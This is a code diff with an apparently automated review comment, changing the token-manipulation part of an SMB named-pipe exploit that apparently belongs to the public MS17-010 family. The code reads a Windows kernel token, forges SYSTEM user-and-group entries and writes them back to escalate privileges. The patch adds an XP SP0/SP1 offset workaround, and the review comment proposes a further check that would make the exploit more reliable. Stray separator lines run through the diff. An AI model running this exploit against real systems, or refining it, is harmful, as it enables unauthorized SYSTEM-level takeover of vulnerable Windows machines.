more complex fix
@@ -867,15 +867,19 @@ def exploit(target, pipe_name):
|
|||||||
# copy Token data for restoration
|
# copy Token data for restoration
|
||||||
tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
|
tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
|
||||||
|
|
||||||
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
|
|
||||||
|
userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET']
|
||||||
|
userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
|
||||||
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
|
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
|
||||||
# hack to fix XP SP0 and SP1
|
# hack to fix XP SP0 and SP1
|
||||||
if info['os'] == 'WINXP' and info['arch'] == 'x86':
|
if info['os'] == 'WINXP' and info['arch'] == 'x86':
|
||||||
if userAndGroupCount > 4:
|
if userAndGroupCount > 4 or userAndGroupCount == 0: # check NULL too
|
||||||
print("Bad TOKEN offsets detected, performing workaround")
|
print("Bad TOKEN offsets detected, performing workaround")
|
||||||
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'])[0]
|
userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
|
||||||
|
userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
|
||||||
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'])[0]
|
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'])[0]
|
||||||
|
|
||||||
|
|
||||||
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
|
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
|
||||||
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
|
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
|
||||||
|
|
||||||
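Review bot: After the XP fallback sets `userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']`, the re-read `userAndGroupCount` and `userAndGroupsAddr` are not checked again, so if the SP0/SP1 offsets are also wrong the values go straight into `create_fake_SYSTEM_UserAndGroups` and the `write_data` calls in the following hunks. The new `== 0` test only decides whether to take the workaround; it does not catch a zero or out-of-range count coming back from the second `unpack_from`. A guard immediately after the fallback, using the same bound the first check uses, e.g. `if userAndGroupCount == 0 or userAndGroupCount > 4: raise RuntimeError('TOKEN offsets still invalid after SP0/SP1 workaround')`, would fail closed instead of continuing with unverified data. The trailing `# check NULL too` would also read better as `# a count of 0 is impossible for a real token, so it also indicates wrong offsets`. The enclosing `exploit` function starts and ends outside this hunk.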
@@ -883,7 +887,7 @@ def exploit(target, pipe_name):
|
|||||||
# modify UserAndGroups info
|
# modify UserAndGroups info
|
||||||
fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
|
fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
|
||||||
if fakeUserAndGroupCount != userAndGroupCount:
|
if fakeUserAndGroupCount != userAndGroupCount:
|
||||||
write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', fakeUserAndGroupCount))
|
write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount))
|
||||||
write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
|
write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
|
||||||
else:
|
else:
|
||||||
# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
|
# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
|
||||||
@@ -907,7 +911,7 @@ def exploit(target, pipe_name):
|
|||||||
userAndGroupsOffset = userAndGroupsAddr - tokenAddr
|
userAndGroupsOffset = userAndGroupsAddr - tokenAddr
|
||||||
write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
|
write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
|
||||||
if fakeUserAndGroupCount != userAndGroupCount:
|
if fakeUserAndGroupCount != userAndGroupCount:
|
||||||
write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', userAndGroupCount))
|
write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', userAndGroupCount))
|
||||||
else:
|
else:
|
||||||
write_data(conn, info, secCtxAddr, secCtxData)
|
write_data(conn, info, secCtxAddr, secCtxData)
|
||||||
|
|
||||||
|
|||||||